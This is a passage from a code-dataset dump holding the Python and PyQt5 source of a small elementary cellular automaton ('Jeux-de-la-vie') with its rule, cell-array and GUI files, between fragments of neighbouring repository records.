password=password)\n\n# if user is None:\n# raise serializers.ValidationError(\"Invalid login credentials\")\n# try:\n# refresh = RefreshToken.for_user(user)\n# refresh_token = str(refresh)\n# access_token = str(refresh.access_token)\n\n# update_last_login(None, user)\n\n# validation = {\n# 'access': access_token,\n# 'refresh': refresh_token,\n# 'email': user.email,\n# 'role': user.role,\n# }\n\n# return validation\n \n# except AuthUser.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid login credentials\")\n\n \n # def validate_email(self, attrs):\n # email = User.objects.filter(email=attrs)\n # if email.exists():\n # raise serializers.ValidationError('This email already exists')\n # return attrs\n\n\n"
}
] | 8 |
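The serializer above gates registration on a combined letter/digit/symbol pattern; a tiny standalone check of that exact regex against made-up inputs:

```python
import re

# Same pattern as UserSerializer.validate: at least 8 chars, with at least one
# letter, one digit and one special character from the allowed set
check_password = re.compile(r'^(?=.*[A-Za-z])(?=.*\d)(?=.*[$@$!%*#?&])[A-Za-z\d$@$!%*#?&]{8,}$')

for candidate in ['abc12345', 'abc123!x', 'short1!']:  # made-up samples
    print(candidate, bool(check_password.match(candidate)))
# abc12345 -> False (no special char), abc123!x -> True, short1! -> False (too short)
```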
McKay1717/Jeux-de-la-vie | https://github.com/McKay1717/Jeux-de-la-vie | 5344950da4b2555a31fe5262fa4172fac014b5f8 | fda8193e094e223f358647cc059d9c9ae4a96f6b | c24cd116aecccfbb02eb4e50dfc5db47ff89df62 | refs/heads/master | 2020-05-30T22:49:59.676357 | 2019-07-02T10:00:12 | 2019-07-02T10:00:12 | 190,001,420 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.53629469871521,
"alphanum_fraction": 0.539544939994812,
"avg_line_length": 28.30158805847168,
"blob_id": "691fc91a88e4739e982057d9b0db79080dbed373",
"content_id": "906c4eeb9f1c3f2cb0f6479f2cf46e1657dc578e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/Backend/backend.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.CellArray import CellArray\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\nclass Backend:\n def __init__(self, rules, cell_tabs):\n self.__cell_tabs = None\n self.rules = None\n try:\n self.__cell_tabs = cell_tabs\n self.__rules = rules\n except Exception as e:\n raise e\n\n def getCellArray(self):\n return self.__cell_tabs\n\n def getRules(self):\n return self.__rules\n\n def setRules(self, rules_dict):\n if not isinstance(rules_dict, RulesCollection):\n raise TypeError('Expeting a RuleCollection')\n self.__rules = rules_dict\n\n def setCellArray(self, cell_array):\n if not isinstance(cell_array, CellArray):\n raise TypeError('Expeting a CellArray')\n self.__cell_tabs = cell_array\n\n def __generateLineFromRules(self, lastLine):\n newLine =[]\n for i in range(0, len(lastLine)):\n if i != 0:\n a = lastLine[i-1]\n else:\n a = True\n\n b = lastLine[i]\n\n if i != (len(lastLine)-1):\n c = lastLine[i+1]\n else:\n c = True\n try:\n rule = Rule(False,int(a),int(b),int(c))\n except Exception as e:\n raise e\n return\n newLine.append(self.__rules.getRulesDictionnary()[rule])\n for i in range(0, len(newLine)):\n self.__cell_tabs.SetCell(self.__cell_tabs.GetCurrentIterID(), i, newLine[i])\n\n\n def tick(self):\n lastline = []\n for item in self.__cell_tabs:\n lastline.append(item)\n self.__cell_tabs.StartNextIteration()\n try:\n self.__generateLineFromRules(lastline)\n except Exception as e:\n raise e\n"
},
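Because `Rule.__hash__` reads `(b1, b2, b3)` as a 3-bit binary number, a full rule table maps directly onto an 8-bit Wolfram-style rule number; a sketch that builds the dictionary `Backend` expects from such a number (rule 90 is only an example, and note the engine's polarity is True = white, so invert the bits if you want the usual black-on-white convention):

```python
from itertools import product
from Backend.rule import Rule

def rules_from_number(n):
    # Bit k of n is the output for the neighbourhood whose binary value is k
    table = {}
    for b1, b2, b3 in product((0, 1), repeat=3):
        k = (b1 << 2) | (b2 << 1) | b3
        table[Rule(False, b1, b2, b3)] = bool((n >> k) & 1)
    return table

rules_dict = rules_from_number(90)  # example rule number
```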
{
"alpha_fraction": 0.4885764420032501,
"alphanum_fraction": 0.514938473701477,
"avg_line_length": 25.6875,
"blob_id": "4a161743c7fbae4a39867a3ddf96b58b3b6ddbb4",
"content_id": "93d5d98a93da76c27dd37c0dbf958f87580c048a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1707,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 64,
"path": "/Backend/rule.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport binascii\nclass Rule:\n # -1 unknown 0 black 1 white\n def __init__(self, rule_type, b1, b2, b3):\n self.__rule = [False, -1, -1, -1]\n try:\n self.SetRuleType(rule_type)\n self.__SetB1(b1)\n self.__SetB2(b2)\n self.__SetB3(b3)\n except Exception as e:\n raise e\n\n def SetRuleType(self, inputType):\n if type(inputType) is not bool:\n raise TypeError('Only Boolean is allowed')\n else:\n self.__rule[0] = type\n\n def GetRuleType(self):\n return self.__rule[0]\n\n def __SetColor(self, color, pos):\n if not isinstance(color, int):\n raise TypeError('Only Int is allowed')\n elif color not in [0, 1, -1]:\n raise ValueError('Only 0, 1 or -1 is allowed')\n else:\n self.__rule[pos] = color\n\n def __SetB1(self, color):\n try:\n self.__SetColor(color, 1)\n except Exception as e:\n raise e\n\n def __SetB2(self, color):\n try:\n self.__SetColor(color, 2)\n except Exception as e:\n raise e\n\n def __SetB3(self, color):\n try:\n self.__SetColor(color, 3)\n except Exception as e:\n raise e\n\n def GetB1(self):\n return self.__rule[1]\n\n def GetB2(self):\n return self.__rule[2]\n\n def GetB3(self):\n return self.__rule[3]\n\n def __eq__(self, other):\n return (self.GetB1() == other.GetB1()) and (self.GetB2() == other.GetB2()) and (self.GetB3() == other.GetB3())\n\n def __hash__(self):\n s = str(int(self.GetB1()))+str(int(self.GetB2()))+str(int(self.GetB3()))\n return int(s, 2)"
},
{
"alpha_fraction": 0.6540284156799316,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 37.227272033691406,
"blob_id": "a79c0af08b609202e8f373efd7ff74a19815a5fd",
"content_id": "ee97aadc1a359af189db469c05d12d2f79a1505c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 22,
"path": "/Backend/rulesCollection.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.rule import Rule\n\nclass RulesCollection:\n def __init__(self, rulesDictionnaryInput):\n self.__rulesDictionnary = None\n try:\n self.setRulesDictionnary(rulesDictionnaryInput)\n except Exception as e:\n raise e\n\n def setRulesDictionnary(self, rulesDictionnaryInput):\n if type(rulesDictionnaryInput) is not dict:\n raise TypeError('Only Dictionnary is allowed')\n for key in rulesDictionnaryInput:\n if type(key) is not Rule:\n raise TypeError('Only Rule object is allowed as key')\n if type(rulesDictionnaryInput[key]) is not bool:\n raise TypeError('Only bool is allowed as value')\n self.__rulesDictionnary = rulesDictionnaryInput\n\n def getRulesDictionnary(self):\n return self.__rulesDictionnary\n\n\n\n"
},
{
"alpha_fraction": 0.5523999929428101,
"alphanum_fraction": 0.5559999942779541,
"avg_line_length": 28.069766998291016,
"blob_id": "9f9639f2bf40521be2f78416a37515f8eb6f05cb",
"content_id": "41a8f3951a41f4c18feb3403b7e8de2f73ae657e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2500,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 86,
"path": "/Backend/CellArray.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nclass CellArray:\n def __init__(self, row_size):\n # Main array of cell, true = white, false=black\n self.__cell_array = []\n self.__row_size = row_size\n self._cursor = 0\n try:\n self.__InitArray(row_size)\n except Exception as v:\n raise v\n\n # Fill line with True and add it to main array\n def StartNextIteration(self):\n self.__cell_array.append(self.__InitLine())\n\n # Get size of line\n def GetRowSize(self):\n return self.__row_size\n\n # Return the ID of current iteration\n def GetCurrentIterID(self):\n return len(self.__cell_array)-1\n\n # Fill a line with True and return it\n def __InitLine(self):\n y_array = []\n for x in range(0, self.GetRowSize()):\n y_array.append(True)\n return y_array\n\n # Check if input is good and init the first line with a black pixel\n def __InitArray(self, row_size):\n if type(row_size) is not int:\n raise TypeError(str(row_size) + 'is not a integer')\n # Init whole tab to white\n y_array = self.__InitLine()\n self.__cell_array.append(y_array)\n self.__cell_array[0][randint(0, row_size - 1)] = False\n\n # Return the boolean for the iterd_id at the postion y\n def GetCell(self, iterd_id, y):\n try:\n current_cell = self.__cell_array[iterd_id][y]\n except Exception as e:\n raise e\n return current_cell\n\n # Get the position of the cursor\n def GetCursor(self):\n if self.iterate:\n return self.__x\n else:\n raise Exception(\"not currently iterate\")\n\n # Set the boolean for the iterd_id at the postion y\n def SetCell(self, x, y, state):\n if type(state) != bool:\n raise TypeError('Je veux un boolean putain !')\n try:\n self.__cell_array[x][y] = state\n except Exception as e:\n raise e\n\n # Iterate over the line of the current iteration\n def __iter__(self):\n self.__x = self.GetCurrentIterID()\n self.__y = 0\n self.iterate = True\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self):\n row_size = self.GetRowSize() - 1\n\n cell = self.GetCell(self.__x, self.__y)\n if self.__y == row_size:\n raise StopIteration\n self.iterate = False\n return cell\n else:\n self.__y += 1\n return cell\n"
},
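A small usage sketch for the array above — iterating always walks the row of the current iteration:

```python
from Backend.CellArray import CellArray

cells = CellArray(8)            # first row is all white except one random black cell
row = [cell for cell in cells]  # snapshot of the current row as booleans
cells.StartNextIteration()      # append a fresh all-white row
cells.SetCell(cells.GetCurrentIterID(), 0, False)  # paint one cell black
```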
{
"alpha_fraction": 0.5856966972351074,
"alphanum_fraction": 0.6461158990859985,
"avg_line_length": 26.066667556762695,
"blob_id": "9d5d0f83aadd21b7cba7ddd80bd78d0e97db06a9",
"content_id": "53f18e64c48c5411e43236e4758ae43d301e1a6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 30,
"path": "/Backend/main.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "from Backend.backend import Backend\nfrom Backend.CellArray import CellArray\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\ncells = CellArray(50)\nrule1 = Rule(False, 0, 0, 0)\nrule2 = Rule(False, 0, 0, 1)\nrule3 = Rule(False, 0, 1, 0)\nrule4 = Rule(False, 0, 1, 1)\nrule5 = Rule(False, 1, 0, 0)\nrule6 = Rule(False, 1, 0, 1)\nrule7 = Rule(False, 1, 1, 0)\nrule8 = Rule(False, 1, 1, 1)\n\nrules = {rule1: True, rule2: False, rule3: True, rule4: False, rule5: False, rule6: True, rule7: False, rule8: True}\nrules = RulesCollection(rules)\n\nengine = Backend(rules, cells)\n\nfor i in range(0, 100):\n line = []\n cells = engine.getCellArray()\n for e in cells:\n if e:\n line.append(' ')\n else:\n line.append(chr(219))\n print(line)\n engine.tick()"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 16,
"blob_id": "dcf3547ddabc2f524192554a35fee5d56487e08d",
"content_id": "9a37310d45ba0d8647af91d69032dfe67f2898a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 1,
"path": "/README.md",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "# Jeux-de-la-vie\n"
},
{
"alpha_fraction": 0.5920660495758057,
"alphanum_fraction": 0.6128560900688171,
"avg_line_length": 37.3556022644043,
"blob_id": "8b5dc1245a1023f6bc1134993820c832871eef0d",
"content_id": "9b8409600090ffd96325d0fbf93717a0e4fed915",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17823,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 464,
"path": "/Front/__init__.py",
"repo_name": "McKay1717/Jeux-de-la-vie",
"src_encoding": "UTF-8",
"text": "import time\n\nfrom PyQt5 import uic, QtWidgets, QtCore, Qt\n\nimport sys\n\nfrom PyQt5.QtGui import QPixmap, QImage, QBrush\n\nfrom PyQt5.QtWidgets import QFileDialog\n\nfrom Backend.CellArray import CellArray\nfrom Backend.backend import Backend\nfrom Backend.rule import Rule\nfrom Backend.rulesCollection import RulesCollection\n\nRow = 0\nline = 0\ncolumn = 2\n\ncurrent_exec = -1\ntStart = 0\nisExec = False\nisTime = False\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('../Interface/lp74.ui', self)\n self.show()\n\n btn_pause = self.findChild(QtWidgets.QPushButton, \"btn_pause\")\n btn_screen = self.findChild(QtWidgets.QPushButton, \"btn_screen\")\n graphic = self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n\n\n btn_screen.setEnabled(False)\n btn_pause.setEnabled(False)\n\n scene = QtWidgets.QGraphicsScene()\n img = QImage(10, 10, QImage.Format_Mono)\n for i in range(img.height()):\n for j in range(img.height()):\n img.setPixel(i, j, 1)\n pixmap = QPixmap(img)\n pixmap_scaled = pixmap.scaled(graphic.width() - 5, graphic.height() - 5, QtCore.Qt.IgnoreAspectRatio)\n cont = QtWidgets.QLabel()\n cont.setScaledContents(1)\n cont.setPixmap(pixmap_scaled)\n scene.addWidget(cont)\n graphic.setScene(scene)\n\n rules = self.findChild(QtWidgets.QGraphicsView, \"regle\")\n img_rules = QPixmap(\"../Interface/regle254_600.png\")\n img_scaled = img_rules.scaled(rules.width() - 3, rules.height() - 3, QtCore.Qt.IgnoreAspectRatio)\n container = QtWidgets.QLabel()\n container.setScaledContents(1)\n container.setPixmap(img_scaled)\n rule_scene = QtWidgets.QGraphicsScene()\n rule_scene.addWidget(container)\n rules.setScene(rule_scene)\n\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n check1.stateChanged.connect(lambda: state(1, self))\n check2.stateChanged.connect(lambda: state(2, self))\n check3.stateChanged.connect(lambda: state(3, self))\n check4.stateChanged.connect(lambda: state(4, self))\n check5.stateChanged.connect(lambda: state(5, self))\n check6.stateChanged.connect(lambda: state(6, self))\n check7.stateChanged.connect(lambda: state(7, self))\n check8.stateChanged.connect(lambda: state(8, self))\n\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n f = open(\"../Interface/regles.txt\", \"r\")\n for x in f.readlines():\n splited = x.split(\";\")\n cbb_regle.addItem(splited[0], splited[1])\n dic = eval(cbb_regle.currentData())\n\n if dic['111'] == 1:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check1.setCheckState(2)\n if dic['110'] == 1:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check2.setCheckState(2)\n if dic['101'] == 1:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check3.setCheckState(2)\n if dic['100'] == 1:\n check4.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check4.setCheckState(2)\n if dic['011'] == 1:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check5.setCheckState(2)\n if dic['010'] == 1:\n check6.setStyleSheet(\"QCheckBox::indicator 
{background-color: black}\")\n check6.setCheckState(2)\n if dic['001'] == 1:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check7.setCheckState(2)\n if dic['000'] == 1:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check8.setCheckState(2)\n\n cbb_regle.currentIndexChanged.connect(lambda: regles(self))\n f.close()\n\n\ndef regles(self):\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n if cbb_regle.currentData():\n dic = eval(cbb_regle.currentData())\n\n if dic['111'] == 1:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check1.setCheckState(2)\n else:\n check1.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check1.setCheckState(0)\n if dic['110'] == 1:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check2.setCheckState(2)\n else:\n check2.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check2.setCheckState(0)\n if dic['101'] == 1:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check3.setCheckState(2)\n else:\n check3.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check3.setCheckState(0)\n if dic['100'] == 1:\n check4.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check4.setCheckState(2)\n else:\n check4.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check4.setCheckState(0)\n if dic['011'] == 1:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check5.setCheckState(2)\n else:\n check5.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check5.setCheckState(0)\n if dic['010'] == 1:\n check6.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check6.setCheckState(2)\n else:\n check6.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check6.setCheckState(0)\n if dic['001'] == 1:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check7.setCheckState(2)\n else:\n check7.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check7.setCheckState(0)\n if dic['000'] == 1:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n check8.setCheckState(2)\n else:\n check8.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n check8.setCheckState(0)\n\ndef state(i, self):\n check = self.findChild(QtWidgets.QCheckBox, \"check\" + str(i))\n if check.isChecked():\n check.setStyleSheet(\"QCheckBox::indicator {background-color: black}\")\n else:\n check.setStyleSheet(\"QCheckBox::indicator {background-color: white; border: 1px solid}\")\n\n\ndef resizeMatrice():\n global line, matrix\n\n for i in range(line - 1):\n matrix[i].append(0)\n matrix[i].insert(0, 0)\n return matrix\n\n\ndef matrice(engine, nb_exec, code, matrix):\n if code == 0:\n Line = []\n matrix = []\n cells = 
engine.getCellArray()\n for i in range(nb_exec):\n for e in cells:\n if e:\n Line.append(1)\n else:\n Line.append(0)\n matrix.append(Line)\n Line = []\n engine.tick()\n\n return matrix\n else:\n Line = []\n cells = engine.getCellArray()\n for e in cells:\n if e:\n Line.append(1)\n else:\n Line.append(0)\n matrix.append(Line)\n Line = []\n engine.tick()\n return matrix\n\n\ndef etape(self, timer, engine, matrix):\n global Row, line, column, current_exec, tStart\n form = self.findChild(QtWidgets.QFrame, \"form\")\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n nb_exec = sp_exec.value()\n nb_temps = sp_temps.value()\n\n total_exec = nb_exec\n current_exec += 1\n\n if isTime:\n matrix = matrice(engine, 0, 1, matrix)\n\n print('Exec total = ' + str(total_exec) + ' | current = ' + str(current_exec) + ' | time = ' + str(\n time.time() - tStart))\n lcd = self.findChild(QtWidgets.QLCDNumber,\"lcdNumber\")\n lcd.display(time.time() - tStart)\n if isExec and current_exec >= total_exec:\n timer.stop()\n timer.disconnect()\n del timer\n del matrix\n form.setEnabled(True)\n popup = QtWidgets.QMessageBox().information(self, \"Fin de l'éxécution\",\n str(current_exec) + \" itérations effectuées. Simulation terminée.\",\n QtWidgets.QMessageBox.Ok)\n btn_start.setEnabled(True)\n btn_screen.setEnabled(True)\n return\n\n if isTime and (time.time() - tStart) > nb_temps:\n timer.stop()\n timer.disconnect()\n del timer\n del matrix\n form.setEnabled(True)\n popup = QtWidgets.QMessageBox().information(self, \"Fin de l'éxécution\",\n str(nb_temps) + \" secondes écoulées. Simulation terminée.\",\n QtWidgets.QMessageBox.Ok)\n btn_start.setEnabled(True)\n btn_screen.setEnabled(True)\n return\n\n graphic = self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n scene = QtWidgets.QGraphicsScene()\n img = QImage(len(matrix[0]), line - 1, QImage.Format_Mono)\n\n if isExec:\n for i in range(line):\n for j in range(len(matrix[i])):\n if matrix[i][j] == 1:\n img.setPixel(j, i, 0)\n else:\n img.setPixel(j, i, 1)\n if isTime:\n for i in range(line):\n for j in range(len(matrix[i])):\n if matrix[i][j] == 1:\n img.setPixel(j, i, 0)\n else:\n img.setPixel(j, i, 1)\n\n pixmap = QPixmap(img)\n pixmap_scaled = pixmap.scaled(graphic.width() - 5, graphic.height() - 5, QtCore.Qt.IgnoreAspectRatio)\n gr = QtWidgets.QGraphicsPixmapItem()\n gr.setPixmap(pixmap_scaled)\n scene.addItem(gr)\n graphic.setScene(scene)\n line = line + 1\n\n\ndef resetvar():\n global tStart, current_exec, Row, line, column\n column = 2\n line = 1\n Row = 0\n current_exec = -1\n matrix = []\n tStart = time.time()\n\n\ndef start(self):\n form = self.findChild(QtWidgets.QFrame, \"form\")\n\n sp_taille = self.findChild(QtWidgets.QSpinBox, \"sp_taille\")\n if (isTime == False and isExec == False) or sp_taille.value() == 0:\n popup = QtWidgets.QMessageBox().information(self, \"Pas de paramètres\",\n \" Vous devez choisir un nombre d'éxécution ou une durée ainsi qu'une taille de ligne\",\n QtWidgets.QMessageBox.Ok)\n return\n resetvar()\n btn_start.setEnabled(False)\n btn_pause.setEnabled(True)\n btn_screen.setEnabled(False)\n form.setEnabled(False)\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, 
\"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n rule1 = Rule(False, 0, 0, 0)\n rule2 = Rule(False, 0, 0, 1)\n rule3 = Rule(False, 0, 1, 0)\n rule4 = Rule(False, 0, 1, 1)\n rule5 = Rule(False, 1, 0, 0)\n rule6 = Rule(False, 1, 0, 1)\n rule7 = Rule(False, 1, 1, 0)\n rule8 = Rule(False, 1, 1, 1)\n rules = {rule1: not check1.isChecked(), rule2: not check2.isChecked(), rule3: not check3.isChecked(),\n rule4: not check4.isChecked(), rule5: not check5.isChecked(), rule6: not check6.isChecked(),\n rule7: not check7.isChecked(), rule8: not check8.isChecked()}\n\n cells = CellArray(sp_taille.value())\n rules = RulesCollection(rules)\n engine = Backend(rules, cells)\n\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n nb_exec = sp_exec.value()\n nb_temps = sp_temps.value()\n\n total_exec = nb_exec\n matrix = []\n if isExec:\n matrix = matrice(engine, total_exec, 0, matrix)\n\n timer = QtCore.QTimer()\n timer.timeout.connect(lambda: etape(self, timer, engine, matrix))\n\n timer.setInterval(100)\n timer.start()\n btn_pause.pressed.connect(lambda: pause(timer, window))\n\n\ndef StateSpinExec(self):\n global isExec\n radioButtonExec = self.findChild(QtWidgets.QRadioButton, \"rb_is_exec\")\n sp_exec = self.findChild(QtWidgets.QSpinBox, \"sp_nbexec\")\n if radioButtonExec.isChecked():\n sp_exec.setEnabled(True)\n isExec = True\n else:\n sp_exec.setEnabled(False)\n isExec = False\n\n\ndef StateSpinTemps(self):\n global isTime\n radioButtonTemps = self.findChild(QtWidgets.QRadioButton, \"rb_is_time\")\n sp_temps = self.findChild(QtWidgets.QSpinBox, \"sp_temps\")\n if radioButtonTemps.isChecked():\n sp_temps.setEnabled(True)\n isTime = True\n else:\n sp_temps.setEnabled(False)\n isTime = False\n\n\ndef save(self):\n check1 = self.findChild(QtWidgets.QCheckBox, \"check1\")\n check2 = self.findChild(QtWidgets.QCheckBox, \"check2\")\n check3 = self.findChild(QtWidgets.QCheckBox, \"check3\")\n check4 = self.findChild(QtWidgets.QCheckBox, \"check4\")\n check5 = self.findChild(QtWidgets.QCheckBox, \"check5\")\n check6 = self.findChild(QtWidgets.QCheckBox, \"check6\")\n check7 = self.findChild(QtWidgets.QCheckBox, \"check7\")\n check8 = self.findChild(QtWidgets.QCheckBox, \"check8\")\n regle = {\"111\": int(check1.isChecked()), \"110\": int(check2.isChecked()), \"101\": int(check3.isChecked()),\n \"100\": int(check4.isChecked()), \"011\": int(check5.isChecked()), \"010\": int(check6.isChecked()),\n \"001\": int(check7.isChecked()), \"000\": int(check8.isChecked())}\n text, popup = QtWidgets.QInputDialog.getText(self, 'Nom de la règle', 'Entrez le nom de la règle:')\n if popup:\n f = open(\"../Interface/regles.txt\", \"a\")\n string = text + \";\" + str(regle) + \"\\n\"\n f.write(string)\n f.close()\n cbb_regle = self.findChild(QtWidgets.QComboBox, \"cbb_regle\")\n cbb_regle.clear()\n f = open(\"../Interface/regles.txt\", \"r\")\n for x in f.readlines():\n splited = x.split(\";\")\n cbb_regle.addItem(splited[0], splited[1])\n popup = QtWidgets.QMessageBox().information(self, \"Sauvegarde effectuée\",\n \"La règle a été sauvegardée avec succés\", QtWidgets.QMessageBox.Ok)\n\n\ndef pause(timer, self):\n btn_screen = self.findChild(QtWidgets.QPushButton, \"btn_screen\")\n if timer.isActive():\n btn_pause.setText(\"Play\")\n timer.stop()\n btn_screen.setEnabled(True)\n else:\n btn_pause.setText(\"Pause\")\n timer.start()\n btn_screen.setEnabled(False)\n\n\ndef screen(self):\n graphic = 
self.findChild(QtWidgets.QGraphicsView, \"graphic\")\n scene = graphic.scene()\n pixmap = graphic.grab(scene.sceneRect().toRect())\n dlg = QFileDialog()\n dlg.setAcceptMode(QFileDialog.AcceptSave)\n dlg.setNameFilters([\"Images (*.png *.jpg)\"])\n dlg.selectNameFilter(\"Images (*.png *.jpg)\")\n if dlg.exec_():\n pixmap.save(dlg.selectedFiles()[0])\n popup = QtWidgets.QMessageBox().information(self, \"Fichier sauvegardé\",\n \"L'image a été sauvegardé : \" + dlg.selectedFiles()[0],\n QtWidgets.QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = Ui()\n\n btn_start = window.findChild(QtWidgets.QPushButton, \"btn_start\")\n btn_pause = window.findChild(QtWidgets.QPushButton, \"btn_pause\")\n btn_exit = window.findChild(QtWidgets.QPushButton, \"btn_exit\")\n btn_save = window.findChild(QtWidgets.QPushButton, \"btn_save\")\n btn_screen = window.findChild(QtWidgets.QPushButton, \"btn_screen\")\n\n check1 = window.findChild(QtWidgets.QCheckBox, \"check1\")\n\n radioButtonExec = window.findChild(QtWidgets.QRadioButton, \"rb_is_exec\")\n radioButtonExec.toggled.connect(lambda: StateSpinExec(window))\n\n radioButtonTemps = window.findChild(QtWidgets.QRadioButton, \"rb_is_time\")\n radioButtonTemps.toggled.connect(lambda: StateSpinTemps(window))\n\n btn_start.pressed.connect(lambda: start(window))\n btn_save.pressed.connect(lambda: save(window))\n btn_exit.pressed.connect(app.quit)\n btn_screen.pressed.connect(lambda: screen(window))\n\n sys.exit(app.exec_())\n"
}
] | 7 |
MykeNuLeng/generic-webiste | https://github.com/MykeNuLeng/generic-webiste | 93a24751514eb2aa24f7ac01019af853670546c7 | fdd84dda07b18855b74c14a23ee616ef21c1e8a5 | 7154cbeb106680d12427e8881b1d812332cd6516 | refs/heads/main | 2023-05-05T23:11:10.564227 | 2021-06-01T10:07:49 | 2021-06-01T10:07:49 | 369,561,696 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7673674821853638,
"alphanum_fraction": 0.7728519439697266,
"avg_line_length": 69.58064270019531,
"blob_id": "4cace8239cece92f7893b04513b5523af000ffb6",
"content_id": "e7d703ae4450780874576667c66b088956f507b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6564,
"license_type": "no_license",
"max_line_length": 782,
"num_lines": 93,
"path": "/README.md",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
